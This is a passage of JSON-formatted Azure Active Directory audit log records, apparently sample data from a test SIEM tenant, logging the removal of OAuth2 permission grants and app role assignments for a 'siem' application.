"OldValue": "", "NewValue": ""}, {"NewValue": "", "OldValue": "", "Name": "ServicePrincipal.AppId"}, {"Name": "ServicePrincipal.Name", "OldValue": "", "NewValue": ""}, {"Name": "TargetId.ServicePrincipalNames", "OldValue": "", "NewValue": "00000003-0000-0000-c000-000000000000/ags.windows.net;00000003-0000-0000-c000-000000000000;https://canary.graph.microsoft.com;https://graph.microsoft.com;https://ags.windows.net;https://graph.microsoft.us;https://graph.microsoft.com/;https://dod-graph.microsoft.us"}], "ResultStatus": "Success", "ExtendedProperties": [{"Name": "resultType", "Value": "Success"}, {"Name": "auditEventCategory", "Value": "ApplicationManagement"}, {"Name": "nCloud", "Value": ""}, {"Name": "actorContextId", "Value": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd"}, {"Name": "actorObjectId", "Value": "755e500a-6c03-46b0-b53b-282f23374e3b"}, {"Name": "actorObjectClass", "Value": "User"}, {"Name": "actorUPN", "Value": "asr@testsiem.onmicrosoft.com"}, {"Name": "actorAppID", "Value": "18ed3507-a475-4ccb-b669-d66bc9f2a36e"}, {"Name": "actorPUID", "Value": "1003200096971F55"}, {"Name": "teamName", "Value": "MSODS."}, {"Name": "targetContextId", "Value": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd"}, {"Name": "targetObjectId", "Value": "98528ef9-e89b-469a-b19b-fa8e72a00fa6"}, {"Name": "extendedAuditEventCategory", "Value": "ServicePrincipal"}, {"Name": "targetSPN", "Value": "00000003-0000-0000-c000-000000000000/ags.windows.net;00000003-0000-0000-c000-000000000000;https://canary.graph.microsoft.com;https://graph.microsoft.com;https://ags.windows.net;https://graph.microsoft.us;https://graph.microsoft.com/;https://dod-graph.microsoft.us"}, {"Name": "targetName", "Value": "Microsoft Graph"}, {"Name": "targetIncludedUpdatedProperties", "Value": "[\"ServicePrincipal.ObjectID\",\"ServicePrincipal.DisplayName\",\"ServicePrincipal.AppId\",\"ServicePrincipal.Name\",\"TargetId.ServicePrincipalNames\"]"}, {"Name": "correlationId", "Value": "2e358876-29c8-45b5-8dba-e233cf769988"}, {"Name": 
"version", "Value": "2"}, {"Name": "additionalTargets", "Value": "[{\"ObjectID\":\"5c242833-909c-4c6b-bca3-50feaaa98d23\",\"DisplayName\":null,\"ObjectClass\":\"ServicePrincipal\",\"AppId\":null,\"Name\":null}]"}, {"Name": "additionalDetails", "Value": "{\"User-Agent\":\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0\"}"}, {"Name": "env_ver", "Value": "2.1"}, {"Name": "env_name", "Value": "#Ifx.AuditSchema#IfxMsods.AuditCommonEvent"}, {"Name": "env_time", "Value": "2020-02-10T15:16:18.9844570Z"}, {"Name": "env_epoch", "Value": "Z4XUI"}, {"Name": "env_seqNum", "Value": "43649666"}, {"Name": "env_popSample", "Value": "0"}, {"Name": "env_iKey", "Value": "ikey"}, {"Name": "env_flags", "Value": "257"}, {"Name": "env_cv", "Value": "##b2c3071c-9589-469b-9fb1-9311682625c0_00000000-0000-0000-0000-000000000000_b2c3071c-9589-469b-9fb1-9311682625c0"}, {"Name": "env_os", "Value": ""}, {"Name": "env_osVer", "Value": ""}, {"Name": "env_appId", "Value": "restdirectoryservice"}, {"Name": "env_appVer", "Value": "1.0.11737.0"}, {"Name": "env_cloud_ver", "Value": "1.0"}, {"Name": "env_cloud_name", "Value": "MSO-AM5R"}, {"Name": "env_cloud_role", "Value": "restdirectoryservice"}, {"Name": "env_cloud_roleVer", "Value": "1.0.11737.0"}, {"Name": "env_cloud_roleInstance", "Value": "AM5RRDSR581"}, {"Name": "env_cloud_environment", "Value": "PROD"}, {"Name": "env_cloud_deploymentUnit", "Value": "R5"}], "TargetContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", "AzureActiveDirectoryEventType": 1, "Operation": "Remove OAuth2PermissionGrant.", "Id": "ec6ba716-ec04-460a-8d9e-661d732c4689"} +{"OrganizationId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", "CreationTime": "2020-02-10T15:16:18", "Actor": [{"Type": 5, "ID": "asr@testsiem.onmicrosoft.com"}, {"Type": 3, "ID": "1003200096971F55"}, {"Type": 2, "ID": "18ed3507-a475-4ccb-b669-d66bc9f2a36e"}, {"Type": 2, "ID": "User_755e500a-6c03-46b0-b53b-282f23374e3b"}, {"Type": 2, "ID": 
"755e500a-6c03-46b0-b53b-282f23374e3b"}, {"Type": 2, "ID": "User"}], "Version": 1, "ActorContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", "RecordType": 8, "ActorIpAddress": "175.16.199.1", "UserId": "asr@testsiem.onmicrosoft.com", "UserType": 0, "UserKey": "1003200096971F55@testsiem.onmicrosoft.com", "ClientIP": "175.16.199.1", "SupportTicketId": "", "Workload": "AzureActiveDirectory", "Target": [{"Type": 2, "ID": "ServicePrincipal_98528ef9-e89b-469a-b19b-fa8e72a00fa6"}, {"Type": 2, "ID": "98528ef9-e89b-469a-b19b-fa8e72a00fa6"}, {"Type": 2, "ID": "ServicePrincipal"}, {"Type": 1, "ID": "Microsoft Graph"}, {"Type": 2, "ID": "00000003-0000-0000-c000-000000000000"}, {"Type": 4, "ID": "00000003-0000-0000-c000-000000000000/ags.windows.net;00000003-0000-0000-c000-000000000000;https://canary.graph.microsoft.com;https://graph.microsoft.com;https://ags.windows.net;https://graph.microsoft.us;https://graph.microsoft.com/;https://dod-graph.microsoft.us"}], "ObjectId": "00000003-0000-0000-c000-000000000000/ags.windows.net;00000003-0000-0000-c000-000000000000;https://canary.graph.microsoft.com;https://graph.microsoft.com;https://ags.windows.net;https://graph.microsoft.us;https://graph.microsoft.com/;https://dod-graph.microsoft.us", "ModifiedProperties": [{"NewValue": "5c242833-909c-4c6b-bca3-50feaaa98d23", "OldValue": "", "Name": "ServicePrincipal.ObjectID"}, {"Name": "ServicePrincipal.DisplayName", "OldValue": "", "NewValue": ""}, {"Name": "ServicePrincipal.AppId", "OldValue": "", "NewValue": ""}, {"Name": "ServicePrincipal.Name", "OldValue": "", "NewValue": ""}, {"Name": "TargetId.ServicePrincipalNames", "OldValue": "", "NewValue": "00000003-0000-0000-c000-000000000000/ags.windows.net;00000003-0000-0000-c000-000000000000;https://canary.graph.microsoft.com;https://graph.microsoft.com;https://ags.windows.net;https://graph.microsoft.us;https://graph.microsoft.com/;https://dod-graph.microsoft.us"}], "ResultStatus": "Success", "ExtendedProperties": [{"Name": "resultType", 
"Value": "Success"}, {"Name": "auditEventCategory", "Value": "ApplicationManagement"}, {"Name": "nCloud", "Value": ""}, {"Name": "actorContextId", "Value": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd"}, {"Name": "actorObjectId", "Value": "755e500a-6c03-46b0-b53b-282f23374e3b"}, {"Name": "actorObjectClass", "Value": "User"}, {"Name": "actorUPN", "Value": "asr@testsiem.onmicrosoft.com"}, {"Name": "actorAppID", "Value": "18ed3507-a475-4ccb-b669-d66bc9f2a36e"}, {"Name": "actorPUID", "Value": "1003200096971F55"}, {"Name": "teamName", "Value": "MSODS."}, {"Name": "targetContextId", "Value": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd"}, {"Name": "targetObjectId", "Value": "98528ef9-e89b-469a-b19b-fa8e72a00fa6"}, {"Name": "extendedAuditEventCategory", "Value": "ServicePrincipal"}, {"Name": "targetSPN", "Value": "00000003-0000-0000-c000-000000000000/ags.windows.net;00000003-0000-0000-c000-000000000000;https://canary.graph.microsoft.com;https://graph.microsoft.com;https://ags.windows.net;https://graph.microsoft.us;https://graph.microsoft.com/;https://dod-graph.microsoft.us"}, {"Name": "targetName", "Value": "Microsoft Graph"}, {"Name": "targetIncludedUpdatedProperties", "Value": "[\"ServicePrincipal.ObjectID\",\"ServicePrincipal.DisplayName\",\"ServicePrincipal.AppId\",\"ServicePrincipal.Name\",\"TargetId.ServicePrincipalNames\"]"}, {"Name": "correlationId", "Value": "2e358876-29c8-45b5-8dba-e233cf769988"}, {"Name": "version", "Value": "2"}, {"Name": "additionalTargets", "Value": "[{\"ObjectID\":\"5c242833-909c-4c6b-bca3-50feaaa98d23\",\"DisplayName\":null,\"ObjectClass\":\"ServicePrincipal\",\"AppId\":null,\"Name\":null}]"}, {"Name": "additionalDetails", "Value": "{\"User-Agent\":\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0\"}"}, {"Name": "env_ver", "Value": "2.1"}, {"Name": "env_name", "Value": "#Ifx.AuditSchema#IfxMsods.AuditCommonEvent"}, {"Name": "env_time", "Value": "2020-02-10T15:16:18.9844570Z"}, {"Name": "env_epoch", "Value": "Z4XUI"}, 
{"Name": "env_seqNum", "Value": "43649666"}, {"Name": "env_popSample", "Value": "0"}, {"Name": "env_iKey", "Value": "ikey"}, {"Name": "env_flags", "Value": "257"}, {"Name": "env_cv", "Value": "##b2c3071c-9589-469b-9fb1-9311682625c0_00000000-0000-0000-0000-000000000000_b2c3071c-9589-469b-9fb1-9311682625c0"}, {"Name": "env_os", "Value": ""}, {"Name": "env_osVer", "Value": ""}, {"Name": "env_appId", "Value": "restdirectoryservice"}, {"Name": "env_appVer", "Value": "1.0.11737.0"}, {"Name": "env_cloud_ver", "Value": "1.0"}, {"Name": "env_cloud_name", "Value": "MSO-AM5R"}, {"Name": "env_cloud_role", "Value": "restdirectoryservice"}, {"Name": "env_cloud_roleVer", "Value": "1.0.11737.0"}, {"Name": "env_cloud_roleInstance", "Value": "AM5RRDSR581"}, {"Name": "env_cloud_environment", "Value": "PROD"}, {"Name": "env_cloud_deploymentUnit", "Value": "R5"}], "TargetContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", "AzureActiveDirectoryEventType": 1, "Operation": "Remove OAuth2PermissionGrant.", "Id": "ec6ba716-ec04-460a-8d9e-661d732c4689"} +{"OrganizationId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", "CreationTime": "2020-02-10T15:17:00", "Actor": [{"Type": 5, "ID": "asr@testsiem.onmicrosoft.com"}, {"Type": 3, "ID": "1003200096971F55"}, {"Type": 2, "ID": "18ed3507-a475-4ccb-b669-d66bc9f2a36e"}, {"Type": 2, "ID": "User_755e500a-6c03-46b0-b53b-282f23374e3b"}, {"Type": 2, "ID": "755e500a-6c03-46b0-b53b-282f23374e3b"}, {"Type": 2, "ID": "User"}], "Version": 1, "ActorContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", "RecordType": 8, "ActorIpAddress": "175.16.199.1", "UserId": "asr@testsiem.onmicrosoft.com", "UserType": 0, "UserKey": "1003200096971F55@testsiem.onmicrosoft.com", "ClientIP": "175.16.199.1", "SupportTicketId": "", "Workload": "AzureActiveDirectory", "Target": [{"Type": 2, "ID": "ServicePrincipal_efe101d0-818a-4f19-b2f8-53186f8218ad"}, {"Type": 2, "ID": "efe101d0-818a-4f19-b2f8-53186f8218ad"}, {"Type": 2, "ID": "ServicePrincipal"}, {"Type": 1, "ID": "Office 365 
Management APIs"}, {"Type": 2, "ID": "c5393580-f805-4401-95e8-94b7a6ef2fc2"}, {"Type": 4, "ID": "c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com"}], "ObjectId": "c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com", "ModifiedProperties": [{"Name": "ServicePrincipal.ObjectID", "OldValue": "", "NewValue": "5c242833-909c-4c6b-bca3-50feaaa98d23"}, {"Name": "ServicePrincipal.DisplayName", "OldValue": "", "NewValue": "siem"}, {"Name": "ServicePrincipal.AppId", "OldValue": "", "NewValue": "71a0194b-b70c-44a6-82f2-d4670aee4585"}, {"Name": "ServicePrincipal.Name", "OldValue": "", "NewValue": "71a0194b-b70c-44a6-82f2-d4670aee4585"}, {"Name": "TargetId.ServicePrincipalNames", "OldValue": "", "NewValue": "c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com"}], "ResultStatus": "Success", "ExtendedProperties": [{"Name": "resultType", "Value": "Success"}, {"Name": "auditEventCategory", "Value": "ApplicationManagement"}, {"Name": "nCloud", "Value": ""}, {"Name": "actorContextId", "Value": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd"}, {"Name": "actorObjectId", "Value": "755e500a-6c03-46b0-b53b-282f23374e3b"}, {"Name": "actorObjectClass", "Value": "User"}, {"Name": "actorUPN", "Value": "asr@testsiem.onmicrosoft.com"}, {"Name": "actorAppID", "Value": "18ed3507-a475-4ccb-b669-d66bc9f2a36e"}, {"Name": "actorPUID", "Value": "1003200096971F55"}, {"Name": "teamName", "Value": "MSODS."}, {"Name": "targetContextId", "Value": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd"}, {"Name": "targetObjectId", "Value": "efe101d0-818a-4f19-b2f8-53186f8218ad"}, {"Name": "extendedAuditEventCategory", "Value": "ServicePrincipal"}, {"Name": "targetSPN", "Value": 
"c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com"}, {"Name": "targetName", "Value": "Office 365 Management APIs"}, {"Name": "targetIncludedUpdatedProperties", "Value": "[\"ServicePrincipal.ObjectID\",\"ServicePrincipal.DisplayName\",\"ServicePrincipal.AppId\",\"ServicePrincipal.Name\",\"TargetId.ServicePrincipalNames\"]"}, {"Name": "correlationId", "Value": "b2484c3c-5461-43ab-850b-70fccf706796"}, {"Name": "version", "Value": "2"}, {"Name": "additionalTargets", "Value": "[{\"ObjectID\":\"5c242833-909c-4c6b-bca3-50feaaa98d23\",\"DisplayName\":\"siem\",\"ObjectClass\":\"ServicePrincipal\",\"AppId\":\"71a0194b-b70c-44a6-82f2-d4670aee4585\",\"Name\":\"71a0194b-b70c-44a6-82f2-d4670aee4585\"}]"}, {"Name": "additionalDetails", "Value": "{\"User-Agent\":\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0\"}"}, {"Name": "env_ver", "Value": "2.1"}, {"Name": "env_name", "Value": "#Ifx.AuditSchema#IfxMsods.AuditCommonEvent"}, {"Name": "env_time", "Value": "2020-02-10T15:17:00.2133065Z"}, {"Name": "env_epoch", "Value": "OLE3R"}, {"Name": "env_seqNum", "Value": "55908032"}, {"Name": "env_popSample", "Value": "0"}, {"Name": "env_iKey", "Value": "ikey"}, {"Name": "env_flags", "Value": "257"}, {"Name": "env_cv", "Value": "##53a69eec-6bcd-473f-9c68-150d680e0776_00000000-0000-0000-0000-000000000000_53a69eec-6bcd-473f-9c68-150d680e0776"}, {"Name": "env_os", "Value": ""}, {"Name": "env_osVer", "Value": ""}, {"Name": "env_appId", "Value": "restdirectoryservice"}, {"Name": "env_appVer", "Value": "1.0.11737.0"}, {"Name": "env_cloud_ver", "Value": "1.0"}, {"Name": "env_cloud_name", "Value": "MSO-AM5R"}, {"Name": "env_cloud_role", "Value": "restdirectoryservice"}, {"Name": "env_cloud_roleVer", "Value": "1.0.11737.0"}, {"Name": "env_cloud_roleInstance", "Value": "AM5RRDSR551"}, {"Name": "env_cloud_environment", "Value": "PROD"}, {"Name": 
"env_cloud_deploymentUnit", "Value": "R5"}], "TargetContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", "AzureActiveDirectoryEventType": 1, "Operation": "Remove app role assignment from service principal.", "Id": "31d7436e-85aa-4aee-a945-6a0ff51ea975"} +{"OrganizationId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", "CreationTime": "2020-02-10T15:17:00", "Actor": [{"Type": 5, "ID": "asr@testsiem.onmicrosoft.com"}, {"Type": 3, "ID": "1003200096971F55"}, {"Type": 2, "ID": "18ed3507-a475-4ccb-b669-d66bc9f2a36e"}, {"Type": 2, "ID": "User_755e500a-6c03-46b0-b53b-282f23374e3b"}, {"Type": 2, "ID": "755e500a-6c03-46b0-b53b-282f23374e3b"}, {"Type": 2, "ID": "User"}], "Version": 1, "ActorContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", "RecordType": 8, "ActorIpAddress": "175.16.199.1", "UserId": "asr@testsiem.onmicrosoft.com", "UserType": 0, "UserKey": "1003200096971F55@testsiem.onmicrosoft.com", "ClientIP": "175.16.199.1", "SupportTicketId": "", "Workload": "AzureActiveDirectory", "Target": [{"Type": 2, "ID": "ServicePrincipal_efe101d0-818a-4f19-b2f8-53186f8218ad"}, {"Type": 2, "ID": "efe101d0-818a-4f19-b2f8-53186f8218ad"}, {"Type": 2, "ID": "ServicePrincipal"}, {"Type": 1, "ID": "Office 365 Management APIs"}, {"Type": 2, "ID": "c5393580-f805-4401-95e8-94b7a6ef2fc2"}, {"Type": 4, "ID": "c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com"}], "ObjectId": "c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com", "ModifiedProperties": [{"Name": "ServicePrincipal.ObjectID", "OldValue": "", "NewValue": "5c242833-909c-4c6b-bca3-50feaaa98d23"}, {"Name": "ServicePrincipal.DisplayName", "OldValue": "", "NewValue": "siem"}, {"Name": "ServicePrincipal.AppId", "OldValue": "", "NewValue": "71a0194b-b70c-44a6-82f2-d4670aee4585"}, {"Name": "ServicePrincipal.Name", "OldValue": "", 
"NewValue": "71a0194b-b70c-44a6-82f2-d4670aee4585"}, {"Name": "TargetId.ServicePrincipalNames", "OldValue": "", "NewValue": "c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com"}], "ResultStatus": "Success", "ExtendedProperties": [{"Name": "resultType", "Value": "Success"}, {"Name": "auditEventCategory", "Value": "ApplicationManagement"}, {"Name": "nCloud", "Value": ""}, {"Name": "actorContextId", "Value": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd"}, {"Name": "actorObjectId", "Value": "755e500a-6c03-46b0-b53b-282f23374e3b"}, {"Name": "actorObjectClass", "Value": "User"}, {"Name": "actorUPN", "Value": "asr@testsiem.onmicrosoft.com"}, {"Name": "actorAppID", "Value": "18ed3507-a475-4ccb-b669-d66bc9f2a36e"}, {"Name": "actorPUID", "Value": "1003200096971F55"}, {"Name": "teamName", "Value": "MSODS."}, {"Name": "targetContextId", "Value": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd"}, {"Name": "targetObjectId", "Value": "efe101d0-818a-4f19-b2f8-53186f8218ad"}, {"Name": "extendedAuditEventCategory", "Value": "ServicePrincipal"}, {"Name": "targetSPN", "Value": "c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com"}, {"Name": "targetName", "Value": "Office 365 Management APIs"}, {"Name": "targetIncludedUpdatedProperties", "Value": "[\"ServicePrincipal.ObjectID\",\"ServicePrincipal.DisplayName\",\"ServicePrincipal.AppId\",\"ServicePrincipal.Name\",\"TargetId.ServicePrincipalNames\"]"}, {"Name": "correlationId", "Value": "b2484c3c-5461-43ab-850b-70fccf706796"}, {"Name": "version", "Value": "2"}, {"Name": "additionalTargets", "Value": "[{\"ObjectID\":\"5c242833-909c-4c6b-bca3-50feaaa98d23\",\"DisplayName\":\"siem\",\"ObjectClass\":\"ServicePrincipal\",\"AppId\":\"71a0194b-b70c-44a6-82f2-d4670aee4585\",\"Name\":\"71a0194b-b70c-44a6-82f2-d4670aee4585\"}]"}, {"Name": "additionalDetails", 
"Value": "{\"User-Agent\":\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0\"}"}, {"Name": "env_ver", "Value": "2.1"}, {"Name": "env_name", "Value": "#Ifx.AuditSchema#IfxMsods.AuditCommonEvent"}, {"Name": "env_time", "Value": "2020-02-10T15:17:00.2133065Z"}, {"Name": "env_epoch", "Value": "OLE3R"}, {"Name": "env_seqNum", "Value": "55908041"}, {"Name": "env_popSample", "Value": "0"}, {"Name": "env_iKey", "Value": "ikey"}, {"Name": "env_flags", "Value": "257"}, {"Name": "env_cv", "Value": "##53a69eec-6bcd-473f-9c68-150d680e0776_00000000-0000-0000-0000-000000000000_53a69eec-6bcd-473f-9c68-150d680e0776"}, {"Name": "env_os", "Value": ""}, {"Name": "env_osVer", "Value": ""}, {"Name": "env_appId", "Value": "restdirectoryservice"}, {"Name": "env_appVer", "Value": "1.0.11737.0"}, {"Name": "env_cloud_ver", "Value": "1.0"}, {"Name": "env_cloud_name", "Value": "MSO-AM5R"}, {"Name": "env_cloud_role", "Value": "restdirectoryservice"}, {"Name": "env_cloud_roleVer", "Value": "1.0.11737.0"}, {"Name": "env_cloud_roleInstance", "Value": "AM5RRDSR551"}, {"Name": "env_cloud_environment", "Value": "PROD"}, {"Name": "env_cloud_deploymentUnit", "Value": "R5"}], "TargetContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", "AzureActiveDirectoryEventType": 1, "Operation": "Add a deletion-marked app role assignment grant to service principal as part of link removal.", "Id": "7bca6665-4d58-4df9-bd34-4d92e1fc63aa"} +{"OrganizationId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", "CreationTime": "2020-02-10T15:17:00", "Actor": [{"Type": 5, "ID": "asr@testsiem.onmicrosoft.com"}, {"Type": 3, "ID": "1003200096971F55"}, {"Type": 2, "ID": "18ed3507-a475-4ccb-b669-d66bc9f2a36e"}, {"Type": 2, "ID": "User_755e500a-6c03-46b0-b53b-282f23374e3b"}, {"Type": 2, "ID": "755e500a-6c03-46b0-b53b-282f23374e3b"}, {"Type": 2, "ID": "User"}], "Version": 1, "ActorContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", "RecordType": 8, "ActorIpAddress": "175.16.199.1", "UserId": 
"asr@testsiem.onmicrosoft.com", "UserType": 0, "UserKey": "1003200096971F55@testsiem.onmicrosoft.com", "ClientIP": "175.16.199.1", "SupportTicketId": "", "Workload": "AzureActiveDirectory", "Target": [{"Type": 2, "ID": "ServicePrincipal_efe101d0-818a-4f19-b2f8-53186f8218ad"}, {"Type": 2, "ID": "efe101d0-818a-4f19-b2f8-53186f8218ad"}, {"Type": 2, "ID": "ServicePrincipal"}, {"Type": 1, "ID": "Office 365 Management APIs"}, {"Type": 2, "ID": "c5393580-f805-4401-95e8-94b7a6ef2fc2"}, {"Type": 4, "ID": "c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com"}], "ObjectId": "c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com", "ModifiedProperties": [{"Name": "ServicePrincipal.ObjectID", "OldValue": "", "NewValue": "5c242833-909c-4c6b-bca3-50feaaa98d23"}, {"Name": "ServicePrincipal.DisplayName", "OldValue": "", "NewValue": "siem"}, {"Name": "ServicePrincipal.AppId", "OldValue": "", "NewValue": "71a0194b-b70c-44a6-82f2-d4670aee4585"}, {"NewValue": "71a0194b-b70c-44a6-82f2-d4670aee4585", "OldValue": "", "Name": "ServicePrincipal.Name"}, {"Name": "TargetId.ServicePrincipalNames", "OldValue": "", "NewValue": "c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com"}], "ResultStatus": "Success", "ExtendedProperties": [{"Name": "resultType", "Value": "Success"}, {"Name": "auditEventCategory", "Value": "ApplicationManagement"}, {"Name": "nCloud", "Value": ""}, {"Name": "actorContextId", "Value": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd"}, {"Name": "actorObjectId", "Value": "755e500a-6c03-46b0-b53b-282f23374e3b"}, {"Name": "actorObjectClass", "Value": "User"}, {"Name": "actorUPN", "Value": "asr@testsiem.onmicrosoft.com"}, {"Name": "actorAppID", "Value": 
"18ed3507-a475-4ccb-b669-d66bc9f2a36e"}, {"Name": "actorPUID", "Value": "1003200096971F55"}, {"Name": "teamName", "Value": "MSODS."}, {"Name": "targetContextId", "Value": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd"}, {"Name": "targetObjectId", "Value": "efe101d0-818a-4f19-b2f8-53186f8218ad"}, {"Name": "extendedAuditEventCategory", "Value": "ServicePrincipal"}, {"Name": "targetSPN", "Value": "c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com"}, {"Name": "targetName", "Value": "Office 365 Management APIs"}, {"Name": "targetIncludedUpdatedProperties", "Value": "[\"ServicePrincipal.ObjectID\",\"ServicePrincipal.DisplayName\",\"ServicePrincipal.AppId\",\"ServicePrincipal.Name\",\"TargetId.ServicePrincipalNames\"]"}, {"Name": "correlationId", "Value": "b2484c3c-5461-43ab-850b-70fccf706796"}, {"Name": "version", "Value": "2"}, {"Name": "additionalTargets", "Value": "[{\"ObjectID\":\"5c242833-909c-4c6b-bca3-50feaaa98d23\",\"DisplayName\":\"siem\",\"ObjectClass\":\"ServicePrincipal\",\"AppId\":\"71a0194b-b70c-44a6-82f2-d4670aee4585\",\"Name\":\"71a0194b-b70c-44a6-82f2-d4670aee4585\"}]"}, {"Name": "additionalDetails", "Value": "{\"User-Agent\":\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0\"}"}, {"Name": "env_ver", "Value": "2.1"}, {"Name": "env_name", "Value": "#Ifx.AuditSchema#IfxMsods.AuditCommonEvent"}, {"Name": "env_time", "Value": "2020-02-10T15:17:00.2133065Z"}, {"Name": "env_epoch", "Value": "OLE3R"}, {"Name": "env_seqNum", "Value": "55908032"}, {"Name": "env_popSample", "Value": "0"}, {"Name": "env_iKey", "Value": "ikey"}, {"Name": "env_flags", "Value": "257"}, {"Name": "env_cv", "Value": "##53a69eec-6bcd-473f-9c68-150d680e0776_00000000-0000-0000-0000-000000000000_53a69eec-6bcd-473f-9c68-150d680e0776"}, {"Name": "env_os", "Value": ""}, {"Name": "env_osVer", "Value": ""}, {"Name": "env_appId", "Value": "restdirectoryservice"}, 
{"Name": "env_appVer", "Value": "1.0.11737.0"}, {"Name": "env_cloud_ver", "Value": "1.0"}, {"Name": "env_cloud_name", "Value": "MSO-AM5R"}, {"Name": "env_cloud_role", "Value": "restdirectoryservice"}, {"Name": "env_cloud_roleVer", "Value": "1.0.11737.0"}, {"Name": "env_cloud_roleInstance", "Value": "AM5RRDSR551"}, {"Name": "env_cloud_environment", "Value": "PROD"}, {"Name": "env_cloud_deploymentUnit", "Value": "R5"}], "TargetContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", "AzureActiveDirectoryEventType": 1, "Operation": "Remove app role assignment from service principal.", "Id": "31d7436e-85aa-4aee-a945-6a0ff51ea975"} +{"OrganizationId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", "CreationTime": "2020-02-10T15:17:00", "Actor": [{"Type": 5, "ID": "asr@testsiem.onmicrosoft.com"}, {"Type": 3, "ID": "1003200096971F55"}, {"Type": 2, "ID": "18ed3507-a475-4ccb-b669-d66bc9f2a36e"}, {"Type": 2, "ID": "User_755e500a-6c03-46b0-b53b-282f23374e3b"}, {"Type": 2, "ID": "755e500a-6c03-46b0-b53b-282f23374e3b"}, {"Type": 2, "ID": "User"}], "Version": 1, "ActorContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", "RecordType": 8, "ActorIpAddress": "175.16.199.1", "UserId": "asr@testsiem.onmicrosoft.com", "UserType": 0, "UserKey": "1003200096971F55@testsiem.onmicrosoft.com", "ClientIP": "175.16.199.1", "SupportTicketId": "", "Workload": "AzureActiveDirectory", "Target": [{"Type": 2, "ID": "ServicePrincipal_efe101d0-818a-4f19-b2f8-53186f8218ad"}, {"Type": 2, "ID": "efe101d0-818a-4f19-b2f8-53186f8218ad"}, {"Type": 2, "ID": "ServicePrincipal"}, {"Type": 1, "ID": "Office 365 Management APIs"}, {"Type": 2, "ID": "c5393580-f805-4401-95e8-94b7a6ef2fc2"}, {"Type": 4, "ID": "c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com"}], "ObjectId": 
"c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com", "ModifiedProperties": [{"Name": "ServicePrincipal.ObjectID", "OldValue": "", "NewValue": "5c242833-909c-4c6b-bca3-50feaaa98d23"}, {"NewValue": "siem", "OldValue": "", "Name": "ServicePrincipal.DisplayName"}, {"Name": "ServicePrincipal.AppId", "OldValue": "", "NewValue": "71a0194b-b70c-44a6-82f2-d4670aee4585"}, {"Name": "ServicePrincipal.Name", "OldValue": "", "NewValue": "71a0194b-b70c-44a6-82f2-d4670aee4585"}, {"NewValue": "c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com", "OldValue": "", "Name": "TargetId.ServicePrincipalNames"}], "ResultStatus": "Success", "ExtendedProperties": [{"Name": "resultType", "Value": "Success"}, {"Name": "auditEventCategory", "Value": "ApplicationManagement"}, {"Name": 